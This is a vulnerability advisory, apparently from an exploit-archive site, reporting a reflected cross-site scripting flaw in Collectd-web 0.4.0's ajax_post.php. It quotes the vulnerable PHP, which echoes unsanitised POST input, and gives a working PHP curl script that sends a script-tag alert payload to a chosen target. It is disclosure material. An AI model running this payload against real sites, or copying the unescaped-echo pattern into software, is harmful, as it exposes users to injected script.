Collectd-web XSS Vulnerabilitie

2016.05.23
Credit: MehrdadLinux
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Title -Collectd-web XSS # Exploit Title : XSS Vulnerabilitie in Collectd-web # Date: Sun May 22 11:55:36 EDT 2016 # Reported Date : Sun May 22 11:55:36 EDT 2016 # Vendor Homepage: https://collectd.org/wiki/index.php/Collectd-web # Version: Version: 0.4.0 # Software Link: https://github.com/httpdss/collectd-web # solution :https://github.com/httpdss/collectd-web/issues/77 # Exploit Author :MehrdadLinux # Tested On : Linux Platforms. # Facebook : https://facebook.com/MehrdadLinux # Twitter : http://twitter.com/MehrdadLinux # Detailed Vul: http://blog.opsnit.com =========================================================================================== 1. VULNERABILITY ------------------------- XSS Vulnerabilitie in Collectd-web 0.4.0 – January2016 2. BACKGROUND ------------------------- Collectd-web is a web-based front-end for RRD data collected by collectd. It is based on contrib/collection.cgi, a demo CGI script included in collectd. With strong emphasis on the usage of Jquery and JqueryUI, Collectd-Web manages to give sysadmins a nice yet functional interface. 3. DESCRIPTION ------------------------- XSS in ajax_post.php https://github.com/httpdss/collectd-web/blob/master/media/jqtouch/demos/main/ajax_post.php 1 <?php 2 $theaters = array("Los Gatos Cinema","Cinelux Plaza Theatre","Camera 7"); 3 $movies = array("Transformers","Knocked Up","Live Free Die Hard"); 4 $title = "-"; 5 if ($_POST["zip"]) { 6 $title = "Zip " . $_POST['zip']; 7 } else { 8 $title = $_POST['movie']; 9 } 10 ?> 11 <div> 12 <div class="toolbar"> 13 <h1><?php echo $title ?></h1> 14 <a href="#" class="button back">Back</a> 15 </div> 16 <ul class="edgetoedge"> 17 <?php 18 if ($_POST['zip']) { 19 foreach ($theaters as $theater) { 20 echo '<li><a href="#theater">' . $theater . '</a></li>'; 21 } 22 } else { 23 foreach ($movies as $movie) { 24 echo '<li><a href="#movie">' . $movie . '</a></li>'; 25 } 26 } 27 ?> 28 </ul> 29 <form action="ajax_post.php" method="POST"> 30 <ul class="rounded"> 31 <li><input type="text" name="zip" value="" placeholder="Live post event test" /></li> 32 </ul> 33 <a style="margin:0 10px;color:rgba(0,0,0,.9)" href="#" class="submit whiteButton">Submit</a> 34 35 </form> 36 </div> in line 5 have VULNERABILITY in zip POST method ====================================Exploit========================================= <?php $yourtarget = $argv[1]; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://$yourtarget/collectd-web/media/jqtouch/demos/main/ajax_post.php"); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "movie=></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83))</SCRIPT>"); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ?> ====================================Exploit========================================= 4. discovered by : ------------------------- The vulnerability has been discovered by Mehrdad Abbasi(MehrdadLinux) and Hossein Masoudi (cs.masoudi) email : MehrdadLinux (at) gmail (dot) com http://opsnit.com 5 .LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top